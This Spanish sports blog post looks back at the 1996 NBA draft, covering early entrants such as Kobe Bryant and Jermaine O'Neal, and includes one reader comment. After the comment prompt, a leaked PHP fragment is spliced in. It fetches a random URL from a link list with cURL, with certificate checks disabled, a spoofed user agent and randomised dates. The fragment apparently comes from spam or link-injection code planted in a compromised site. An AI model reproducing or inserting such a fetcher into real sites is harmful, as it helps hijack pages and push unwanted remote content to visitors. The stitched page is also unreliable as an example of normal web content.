La prisa por hacerse mayor rápido: Draft 1996

25 de January de 2008 por Viva_Dirk

Tras la primer entrega, seguimos con la serie “La prisa por hacerse mayor”. Kobe

Le elección de Kevin Garnett en 1995 no tuvo demasiada influencia en las elecciones del año siguiente, los equipos siguieron apostando por jugadores que habían tenido sólidas trayectorias en las universidades, aunque nos encontramos con el que quizá es el caso mas excepcional de la historia del draft: Kobe Bryant, el jugador de Lower Merion HS manifestó que únicamente jugaría en Los Angeles Lakers, y que marcharía a Italia en caso de tener que jugar para otro equipo de la NBA. De este modo, Bryant, que estaba llamado a suceder a Garnett como jugador de instituto elegido en una posición muy alta, fue elegido en el puesto 13 por Charlotte y traspasado inmediatamente a los Lakers.

Sin llegar a influir demasiado, la buena temporada de Garnett dejó paso a otra elección de un PF llegado desde el instituto: Jermaine O’Neal, de Eau Claire HS, fue elegido por Portland en el puesto 17. Su carrera en Portland fue nula, ya que durante sus 4 primeros años en la liga ocupó banquillo profundo. Fue a la edad de 22 años cuando, en Indiana, alcanzó la titularidad, dejando muestras de lo precipitada que fue su presencia en el draft, más cuando posiblemente 2 años de universidad le habrían dado un pick muy alto en el draft de 1998.

JermaineEl ya mencionado anteriormente Kobe Bryant también tuvo un primer año de adaptación a la liga en el que disputó 15 minutos por partido. En su siguiente año dispuso de 26 minutos y ya en su tercer año se convirtió en una de las estrellas de la liga.

Los primeros puestos del draft fueron ocupados por jugadores como Allen Iverson, con 2 años en Georgetown promediando 23 puntos, Marcus Camby que en su tercer año en Massachusetts había estado en 20.5 puntos y 4 tapones, Abdur-Rahim que en su primer año en California alcanzó cotas extrañísimas en un freshman, con 21 puntos y porcentajes superiores a 50% en tiros, Stephon Marbury, otro freshman que con 19 puntos y 4.5 asistencias se ganó el nº4 del draft, y Ray Allen que llegaba con 3 años de experiencia en Connecticut y 23 puntos por partido en su último año. Todos estos jugadores tuvieron un rendimiento inmediato en la liga y todos ellos han tenido en algún momento de su carrera (algunos durante toda) el estatus de estrella de la liga.

Comenta

Un comentario a esta entrada

  1. Garci dice:
    #1

    Y yo me pregunto por que me gusta tanto kobe bryant, y ahora recuerdo el porque, es el mejor.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>